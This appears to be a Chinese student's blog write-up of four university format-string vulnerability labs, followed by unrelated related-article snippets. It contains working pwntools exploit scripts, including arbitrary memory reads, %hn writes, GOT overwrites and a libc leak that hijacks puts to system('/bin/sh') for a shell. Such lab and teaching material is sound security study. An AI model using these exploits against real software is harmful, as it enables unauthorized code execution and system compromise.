ouc 网络安全实验 格式化字符串漏洞
文章目录
- 要求
- lab1
- lab2
- lab3
- lab4
- 结语
因为当时自己做实验的时候出现了很多疑问不会解决,在网上看到了一位大佬 王森ouc 的专栏文章解决了很多问题,也学到了很多知识和解决问题的方法,现在把我的实验解决方法也发上来,希望有不会的同学可以通过博文理解实验内容,同时能够熟练掌握这些知识。感谢这位大佬和课堂中帮助过我的同学老师。
注意:博文仅供学习参考使用,请勿直接复制粘贴,因个人复制粘贴造成的后果博主一概不负责任。
要求
通过 Objdump 或 IDA 逆向找到漏洞
• 通过 GDB 调试,构造完整 payload
• 通过 pwntools 触发漏洞,实现实验目标
lab1
首先查看 IDA 中的反汇编代码。代码大致意思为通过 read_flag()函数从文件“flag.txt”中读取内容,存入变量 flag 中。后面进行输入,通过 printf()输出输入的字符。如果输入的字符存在格式化符号,即可读取内存。
本例的任务是格式化字符串任意读,读取的内容是 flag 文本文件的内容。首先查看文件具体信息,然后获取变量 flag 的地址,通过输入特定字符串确定偏移量,以确定读取地址的时候的偏移量。Payload 里面是前面得到的 flag 的地址,以及格式化字符,用来读flag 地址的内容。
通过 nm 查看 flag 地址,获得 flag 地址“0x0804a034”。
通过输入特定字符串比如 “AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p”
确定字符串的偏移量。可以看到输入字符串之后,输出的“0x41414141”在偏移量为 11 的地方。在此之前,关闭 Linux 的内存地址随机化。
如图是输入字符串后的堆栈图,输入的 AAAA 如前所说偏移量为 11,则后续的 flag 地址偏移量为 12,用%12$s 即可将该处的内容按地址读取。
脚本如下:
from pwn import *
p = process('./lab3_1')
flag_addr =0x0804a034
p.recvuntil(b'Give me something...\n')
payload =p32(flag_addr)+b"%11$s"
p.send(payload)
print(p.recv())
#p.interactive()
lab2
运行程序时进行输入,程序输出输入的字符串,进行一系列操作,后面将 changethis 与“0xBADF00D”进行比较,如果相同,则 read_flag(),输出 flag。
因为 changethis 要和一个数“0xBADF00D”进行比较,所以要修改changethis 的值为这个数,然后程序进入 read_flag(),输出 flag。
通过 nm 查看 changethis 地址,获得 changethis 地址“0x0804a038”,通过输入特定字符串比如“AAAA”确定字符串的偏移量。可以看到输入字符串“AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p”之后,输出的“0x41414141”在偏移量为 11 的地方。
构造本例的 payload 可以使用函数 fmtstr_payload(),payload = fmtstr_payload(11, {0x0804a038: 0xBADF00D})。
构造 payload 也可以手动构造。因为要输入的字符串太多,所以用 hn 输入两个字节。将字符串分成 “0xBAD” 和 “0xF00D”,将其转换为 int 型,“0xBAD” 和 “0xF00D” 分别为 “2989” 和 “61453” 。注意输入构 “0xF00D” 的时候,因为之前构造 “0xBAD” 以及输入了 2989 个字符,而输入的所有字符用来构造 “0xF00D”,所以需要在“61453”的基础上减去 “2989” 得 “58464” 。
脚本如下:
from pwn import *
change_this_addr=0x0804a038
payload = b'%2989c%18$hn'+b'%58464c%19$hn'+b'aaa\x3a\xa0\x04\x08\x38\xa0\x04\x08'
p=process(['./lab3_2',payload])
p.recvuntil(b'\n\n\n-----after------')
print(p.recv())
lab3
运行时输入 buf,程序再输出输入的字符串。
劫持控制流,call _strdup —> _strdup 的 PLT 表 —> _strdup 的got 表,plt 表能从 GOT 表中找到真实的 strdup 函数供程序加载运行。通过输入的 buf 修改 strdup 的 GOT 表,将其修改为one_gadget()函数的地址,当执行 strdup 函数的时候,实际执行的就是后门函数 one_gadget()。本例使用函数 fmtstr_payload()来构造 payload。
通过 nm 查看 one_gadget()函数地址,如图。获得 one_gadget() 函数地址“0x0804852b”。在 IDA 里查看 PLT 表,GOT 表地址,后续要用到的是 GOT 表地址“0x0804a014”。
from pwn import *
p=process('./lab3_3')
return_addr=##你的return地址##
strdup_addr=##你的strdup地址##
p.recv()
payload = fmtstr_payload(11, {strdup_addr:return_addr})
p.sendline(payload)
p.interactive()
lab4
输入用户名,ask_username 将输入的字符串复制到 v4 中,对每个字符加一,ask_password 将修改后的 v4 与 “sysbdmin” 进行比较,不同则退出,相同则继续。因此可得输入的字符串为 “rxraclhm” 。之后输出提示语。可输入的操作共有三种:put(类似新建文件)、get(类似打开文件,查看其内容)、dir(类似查看当前所有文件名)。
① 大致思路:
首先解决如何得到 system 函数的地址的问题。
再解决如何执行 system 函数的问题。
最后解决 system 函数的参数,即“/bin/sh”字符串如何获取的问题。
② 得到 system 函数的地址:
在 IDA 中查看,程序中没有 system 函数。但是 libc.so 文件中有system 函数,因此可以利用程序执行时的动态链接库 libc.so 泄露 system 函数地址。由于函数是动态加载进内存的,代码所在的内存地址不一定相同,但是每个函数的相对地址不变,只是加了一个基址。所以函数本次运行的真正地址 = 基址 + 偏移量。
③ 执行 system 函数:
使用 fmtstr-payload 函数构造 payload,用格式化字符串漏洞修改 show_dir()返回的 puts()函数的 got 表地址,将其修改成system 函数地址,因此执行 puts 函数的时候实际执行的是system 函数。
④ 构造获取权限的 “/bin/sh 字符串”:
puts() 返回的是文件名,system 函数时所用的参数就是文件名,因此可以把文件名写成/bin/sh 来完成调用,一次攻击需要 put 两次文件,可以在最后一次直接使用 ‘/bin/sh;’ 对文件命名。
具体操作:
通过 ldd 查看使用到的动态链接库信息。查看 puts 的 GOT 表地址。
from pwn import *
def put(name,content):p.sendline('put')p.recvuntil('please enter the name of the file you want to upload:')p.sendline(name)p.recvuntil('then, enter the content:')p.sendline(content)
def get(name):p.sendline('get')p.recvuntil('enter the file name you want to get:')p.sendline(name)data=p.recv()return data
def show_dir():p.sendline('dir')
def password():p.recvuntil('Name (ftp.hacker.server:Rainism):')p.sendline('rxraclhm')
p = process('./lab3_4')
password()
libc = ELF('##你的动态链接库##')
system_offset=libc.symbols['system']
puts_offset=libc.symbols['puts']
puts_got=##你的puts的got表地址##
put('addr',b'%8$s'+p32(puts_got))
puts_addr=u32(get('addr')[:4])
system_addr = puts_addr - puts_offset + system_offset
payload = fmtstr_payload(7, {puts_got: system_addr})
put('/bin/sh;',payload)
p.recvuntil('ftp>')
get('/bin/sh;')
show_dir()
p.interactive()
结语
这个实验很难,前前后后三周左右才啃下来这个硬骨头,期间和同学以及助教讨论学习了很多,通过这门课确实学到了不少有用的东西,只要认真做实验,对漏洞这方面的理解会很深的。
相关文章:

ouc 网络安全实验 格式化字符串漏洞
文章目录要求lab1lab2lab3lab4结语因为当时自己做实验的时候出现了很多疑问不会解决,在网上看到了一位大佬 王森ouc 的专栏文章解决了很多问题,也学到了很多知识和解决问题的方法,现在把我的实验解决方法也发上来,希望有不会的同…...

PMSM矢量控制笔记(1.1)——电机的机械结构与运行原理
前言:重新整理以前的知识和文章发现,仍然有许多地方没有学得明白,懵懵懂懂含含糊糊的地方多如牛毛,尤其是到了真正实际写东西或者做项目时,如果不是系统的学习了知识,很容易遇到问题就卡壳,也想…...

2022年全国职业院校技能大赛(中职组)网络安全竞赛试题——中间人攻击渗透测试解析(详细)
B-4任务四:中间人攻击渗透测试 *任务说明:仅能获取Server4的IP地址 *任务说明:仅能获取Server11的IP地址 1.通过上题渗透后得到控制权限的服务器场景Server4进行查看本地的arp缓存表的操作,并将该操作所使用的命令作为Flag值提交; 2.通过上题渗透后得到控制权限的服务…...

MySQL必知必会 | 安全、维护、性能
全球化和本地化 关于MySQL处理不同字符集和语言 字符集和校对顺序 数据库被用来存储和检索数据,不同的语言和字符集需要以不同的方式存储和检索,因此,MySQL需要适应不同的字符集,适应不同的排序方式 一些术语: 字符…...

MaaS Model as a Service 模型即服务
大模型是人工智能的发展趋势和未来。大模型是“大算力强算法” 结合的产物。目前,大模型生态已初具规模。大模型能够实现 AI 从“手工作坊”到“工厂模式”的转变,大模型通常是在大规模无标注 数据上进行训练,学习出一种特征和规则…...

【编程基础】027.C语言中函数在解题中的应用(三)
文章目录C语言中函数的应用1、自定义函数实现二维数组的转置2、自定义函数之整数处理3、自定义函数之数字后移4、自定义函数之字符串拷贝C语言中函数的应用 1、自定义函数实现二维数组的转置 题目描述 写一个函数,使给定的一个二维数组(3&a…...

echart图表之highcharts
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、HighCharts是什么?二、使用步骤1.引入库2.前端代码3.展现结果4.后台自动截图总结前言 提示:这里可以添加本文要记录的大概内容&…...

关于.Net和Java的看法——我见过最牛的一个小实习生经历
1、背景 笔者(小方同学在学习)是一个专科院校的一名普通学生,目前就职于某三线城市的WEB方面.Net开发实习生,在找实习期间和就业期间的一些看法,发表此文,纯个人想法,欢迎讨论,指正…...

基于springboot+vue的“智慧食堂”程序设计实现【毕业论文,源码】
系统登录界面系统架构开发语言:Java框架:springbootJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7数据库工具:Navicat开发软件:eclipse/myeclipse/ideaMaven包:Maven浏览器…...

学计算机选择什么编程语言好一些?
工资水平的话,目前人工智能、大数据和云计算等领域的工资相对较高,但是要求也高,学历,学习能力什么的。然后是后端开发,Python、Java、C等编程语言的工资普遍较高。 不用开发语言的优势 Java:Java是一种…...

持续集成 在 Linux 上搭建 Jenkins,自动构建接口测试
本篇把从 0 开始搭建 Jenkins 的过程分享给大家,希望对小伙伴们有所帮助。 文章目录 在 Linux 上安装 Jenkins在 Linux 上安装 Git在 Linux 上安装 Python在 Linux 上安装 Allure配置 Jenkinsjenkins 赋能 - 使用邮箱发送测试报告jenkins 赋能 - 优化测试报告内容…...

MySQL学习笔记(总结)
1. 数据库服务器操作命令 启动数据库:net start mysql80 (注释:windows命令) 停止数据库:net stop mysql80 (注释:windows命令) 重启数据库:systemctl restart mysql;…...

Android开发 Layout布局 ScrollView
1.LinearLayout 属性 orientation:内部组件排列方式,可选vertical、horizontal,默认horizontal layout_weight: 与平级组件长宽比例,需要将layout_width、layout_height其中一个设置为0dp,表明长或宽与平级组件的长…...

手撕数据结构与算法——树(三指针描述一棵树)
🏆作者主页:king&南星 🎄专栏链接:数据结构 🏅文章目录🌱树一、🌲概念与定义二、🌳定义与预备三、🌴创建结点函数四、🍀查找五、🍁插入六、&a…...

字节跳动Java后端开发实习面经
最近在和同学一起找实习,投了b站、字节和miHoYo的后端开发。b站二月底就投了,但现在也还没回复;miHoYo也还没回复,估计是只面向24届了;感谢字节,给了我面试的机会。字节真的处理好快,不到一周官…...

STM32实战项目-触摸按键
前言: 通过触摸按键控制LED灯以及继电器,具体实现功能如下: 1、触摸按键1单击与长按,控制LED1; 2、触摸按键2单击与长按,控制LED2; 3、触摸按键3单击与长按,控制LED3; 4、触摸按键4单击与长…...

安全行业-术语(万字)
肉鸡 所谓“肉鸡”说一种很形象的比喻,比喻那些可以任意被我们控制的电脑,对方可以是Windows系统,也可以说UNIX/linux系统,可以说普通的个人电脑,也可以是大型的服务器,我们可以像操作自己的电脑那样来操控…...

P1113 杂务(拓扑排序 or 记忆回溯)
题目描述 John的农场在给奶牛挤奶前有很多杂务要完成,每一项杂务都需要一定的时间来完成它。比如:他们要将奶牛集合起来,将他们赶进牛棚,为奶牛清洗乳房以及一些其它工作。尽早将所有杂务完成是必要的,因为这样才有更…...

Web3中文|政策影响下的新加坡Web3步伐喜忧参半
如果说“亚洲四小龙”是新加坡曾经的荣耀,那么当时代进入21世纪的第二个十年,用新加坡经济协会(SEE)副主席、新加坡新跃社科大学教授李国权的话来说,新加坡现在的“荣耀”是全球金融的主要“节点”或区块链行业发展的关…...

Java数据库高阶面试题,好程序员学员分享百度Java面试流程
小源下面分享一位好程序员的学员去百度Java面试流程!百度技术一面(20分钟)1、自我介绍很流畅捡重点介绍2、数据结构算法好不好挺好的(其实心还是有点虚,不过最近刷了很多好程序员出的题感觉没问题!)3、找到单链表的三等分点,如果单…...

栈和队列习题精选(持续更新中)
第一题(括号匹配)给定一个只包括 (,),{,},[,] 的字符串 s ,判断字符串是否有效。有效字符串需满足:1.左括号必须用相同类型的右括号闭合。2.左括号必须以正确的顺序闭合。…...

大数据开发 - Java入门6
目录标题do-while循环练习1:从键盘输入单词,讲输入的单词输出到控制台,输入是exit时退出循环练习2:键盘输入密码和确认密码,两次密码一致就退出循环打印注册成功,两次密码不一致就循环输入两次密码死循环fo…...

开源超级终端工具——WindTerm
1、下载和安装(我的是win10,其他版本各位自选) Releases kingToolbox/WindTerm GitHub 安装的话,相信大家不用我赘述了。 初始界面是这样的: 2、WindTerm使用 2.1 本地会话(最下面那个框,发…...

【Linux】信号常见概念
文章目录信号入门生活中的信号技术应用角度的信号signal函数注意事项信号的概念信号的产生信号的记录(保存)信号处理常见方式概述信号入门 生活中的信号 你在网上买了很多件商品,在等待不同商品快递的到来 但即便快递还没有到来,你也知道快递到了的时候应该怎么处理快递,也就…...

15000 字的 SQL 语句大全 第一部分
一、基础 1、说明:创建数据库CREATE DATABASE database-name 2、说明:删除数据库drop database dbname 3、说明:备份sql server--- 创建 备份数据的 device USE master EXEC sp_addumpdevice disk, testBack, c:\mssql7backup\MyNwind_1.dat …...

突发——字节跳动被要求出售 TikTok 股票,否则禁令,低代码也曾被打压
一、欲加之罪,何患无辞! 正值人们对TikTok和其它社交媒体平台对年轻用户的影响进行更广泛、持续的反思之际,美政客们以数据安全为由要求TikTok出售股票,已然不顾文明国家的体面。 在美国,TikTok拥有1.4亿用户&#x…...

2023年网络安全趋势
数据安全越来越重要。 我国《数据安全法》提出“建立健全数据安全治理体系”,各地区部门均在探索和简历数据分类分级、重要数据识别与重点保护制度。 数据安全治理不仅是一系列技术应用或产品,更是包括组织构建、规范制定、技术支撑等要素共同完成数据…...

html练习
1.用户注册界面 代码: <!DOCTYPE html> <html><head><meta charset"utf-8"><title></title></head><body><form action"#" method"get"><table border"1" widt…...

【Redis】Redis 是如何保证高可用的?(背诵版)
Redis 是如何保证高可用的?1. 说一下 Redis 是如何保证高可用的?2. 了解过主从复制么?2.1 Redis 主从复制主要的作用是什么?2.2 Redis 主从模式的拓扑结构?(1)一主一从结构(2)一主多…...

Qt---去掉标题栏后,最大化应用程序窗口时,窗口遮住了任务栏
// showMaximized(); // Qt最大化显示函数 任务栏都会覆盖static bool max false;static QRect location this->geometry();if (max) {this->setGeometry(location);//回复窗口原大小和位置// ui->maxBtn->setIcon(QIcon(":/MAX_.png"));}else {// ui-…...